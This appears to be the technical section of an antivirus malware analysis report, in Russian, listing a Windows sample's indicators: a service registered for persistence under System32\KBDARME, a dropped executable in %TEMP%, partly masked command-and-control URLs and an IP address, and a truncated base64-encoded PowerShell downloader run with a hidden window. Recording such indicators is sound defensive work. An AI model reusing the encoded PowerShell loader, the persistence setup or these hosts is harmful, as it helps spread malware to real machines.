Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\NlsData001d] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\NlsData001d] 'ImagePath' = '"<SYSTEM32>\KBDARME\NlsData001d.exe"'
- 'NlsData001d' "<SYSTEM32>\KBDARME\NlsData001d.exe"
- 'NlsData001d' <SYSTEM32>\KBDARME\NlsData001d.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQADMAZAA4ADQAbgBpAD0AKAAnAFUAJwArACgAJwBmACcAKwAnADAAbQB3ACcAKwAnAHIAbAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgBWADoAdABFAG0AcABcAFcATwByAEQAXAAyADAAMQA5AFwAIAAtAG...
- %TEMP%\word\2019\sks2c17.exe
- <SYSTEM32>\kbdarme\nlsdata001d.exe
- %TEMP%\word\2019\sks2c17.exe в <SYSTEM32>\kbdarme\nlsdata001d.exe
- '67.##.210.95':80
- http://ab#####dbelow.com.au/cgi-bin/Lbi20Tu/
- http://67.##.210.95/hNnJUtmQ2Hi/hDM6M/OFoQeg5ajebAupEw5/1Ho0XCgcqALvYoPgns/
- DNS ASK ab#####dbelow.com.au
- '%TEMP%\word\2019\sks2c17.exe'
- '<SYSTEM32>\kbdarme\nlsdata001d.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQADMAZAA4ADQAbgBpAD0AKAAnAFUAJwArACgAJwBmACcAKwAnADAAbQB3ACcAKwAnAHIAbAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgBWADoAdABFAG0AcABcAFcATwByAEQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)